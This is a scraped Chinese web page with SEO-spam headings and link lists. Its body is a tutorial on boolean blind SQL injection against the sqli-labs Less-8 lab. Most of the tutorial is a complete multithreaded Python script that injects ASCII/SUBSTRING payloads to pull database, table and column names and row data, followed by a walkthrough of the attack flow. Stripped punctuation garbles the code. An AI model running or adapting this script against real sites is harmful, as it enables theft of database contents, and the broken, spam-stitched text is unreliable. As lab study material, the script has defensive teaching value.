当前位置: 首页 > news >正文

ucenter 整合两个数据库网站网站使用自己的服务器

ucenter 整合两个数据库网站,网站使用自己的服务器,国内最新新闻消息今天的,微网站免费搭建平台什么是sql注入#xff1f; SQL 注入#xff08;SQL Injection#xff09;是一种常见的 Web 安全漏洞#xff0c;攻击者可以通过构造恶意 SQL 语句来访问数据库中的敏感信息。在某些情况下#xff0c;服务器不会直接返回查询结果#xff0c;而是通过布尔值#xff08;Tr…什么是sql注入 SQL 注入SQL Injection是一种常见的 Web 安全漏洞攻击者可以通过构造恶意 SQL 语句来访问数据库中的敏感信息。在某些情况下服务器不会直接返回查询结果而是通过布尔值True/False或时间延迟等方式提供间接反馈这类攻击被称为 盲注Blind SQL Injection。 布尔盲注代码 import requests import concurrent.futuresdef binary_search_character(url, query, index, low32, high127):while low high:mid (low high 1) // 2payload f1 AND ASCII(SUBSTRING(({query}),{index},1)) {mid} -- res {id: payload}r requests.get(url, paramsres)if You are in.......... in r.text:low midelse:high mid - 1return chr(low) if low 32 else def extract_data(url, query, max_length200):extracted_data [] * max_lengthwith concurrent.futures.ThreadPoolExecutor(max_workers10) as executor:future_to_index {executor.submit(binary_search_character, url, query, i): i for i in range(1, max_length 1)}for future in concurrent.futures.as_completed(future_to_index):index future_to_index[future]try:result future.result()if result:extracted_data[index - 1] resultprint(f: {.join(extracted_data).strip()})except Exception as exc:print(fError extracting character {index}: {exc})return .join(extracted_data).strip()if __name__ __main__:url http://127.0.0.1/sqlilabs/Less-8/index.phpdatabase_name extract_data(url, SELECT database())print(f数据库名: {database_name})table_name_query fSELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema{database_name}table_names extract_data(url, table_name_query)print(f表名: {table_names})table_name table_names.split(,)[0]column_name_query fSELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name{table_name} AND table_schema{database_name}column_names extract_data(url, column_name_query)print(f列名: {column_names})column_name column_names.split(,)[1]data_query fSELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}extracted_values extract_data(url, data_query)print(f数据: {extracted_values})print(f数据库名: {database_name})print(f表名: {table_names})print(f列名: {column_names})print(f数据: {extracted_values}) 代码主要内容 1二分法查找单个字符 while low high:mid (low high 1) // 2采用二分查找方法缩小可能的 ASCII 码范围。 SQL 注入 Payload payload f1 AND ASCII(SUBSTRING(({query}),{index},1)) {mid} -- SUBSTRING(({query}),{index},1): 取出 SQL 结果的第 index 个字符。ASCII(...): 获取该字符的 ASCII 码。 {mid}: 判断该字符的 ASCII 是否大于等于 mid。 2并发优化数据提取 with concurrent.futures.ThreadPoolExecutor(max_workers10) as executor:使用 ThreadPoolExecutor 并发执行多个字符的爆破提高速度。 future_to_index {executor.submit(binary_search_character, url, query, i): i for i in range(1, max_length 1)}提交多个任务每个任务负责获取 SQL 结果中的某个字符。 攻击流程 获取数据库名 database_name extract_data(url, SELECT database())获取表名 table_name_query fSELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema{database_name}获取列名 column_name_query fSELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name{table_name} AND table_schema{database_name}提取数据 data_query fSELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}代码优化 1. 并发优化 使用 ThreadPoolExecutor 并发执行查询同时获取多个字符提高数据提取效率。减少等待时间相比单线程依次查询每个字符多线程可以同时进行多个查询加快数据恢复。 2. 自动化数据提取 从数据库名到数据内容全程自动化 依次提取数据库名、表名、列名、数据无需手动输入 SQL 语句提高攻击自动化程度。 效果展示使用sqli-labs靶场的第8关
http://www.dnsts.com.cn/news/162512.html

相关文章:

  • 百度c2c平台重庆seo服务
  • 石家庄网站设计制作有专门教做蛋糕的网站
  • 网站建设推广需要多少钱制作公众号的软件
  • 红色网站源码网站动图怎么做
  • 404网站怎么做自己制作简易网页
  • 网站建设毕业设计刻光盘商城建设开发
  • 网站开发是否属于无形资产国外代理服务器ip免费
  • 网站建设技术网站建广告策划书word模板
  • 购物帮做特惠的网站重庆市建筑工程造价信息网
  • 电商建设网站哪家好顺企网企业名录
  • 政务网站建设云计算中心合肥专业网站制作团队
  • 信息技术网站建设专业免费网站入口在哪
  • 做跨境电商在什么网站选品华为官网手机商城
  • 教做游戏的网站提供给他人做视频解析的网站源码
  • 网站开发网络公司兼职深圳市多语言网站建设公司
  • 网站诊断分析案例网站 标准
  • word做网站框架充电宝seo关键词优化
  • 国内可以使用的自己建站哪个网站可以做字体
  • 韩国私人网站服务器北京做冷冻牛羊肉的网站
  • 黑龙江做网站找谁软件项目开发的阶段和任务
  • 网站服务器怎么进建站推荐网站
  • 唐山建网站的公司深圳宝安龙岗紧急寻人
  • 湖北黄石网站群建设html代码颜色
  • 好网站建设公司哪家好?游戏网站的设计
  • 电商平台网站 建设目标汽车网站更新怎么做
  • 人才网网站开发手册做线上网站需要钱吗
  • 网站建设的主机平面制图自学教程
  • 合肥网站建设cnfg网站建设采取招标的形式
  • 微信网站域名亿网行网站建设114企业网
  • 如何开网站详细步骤图三网网络建设公司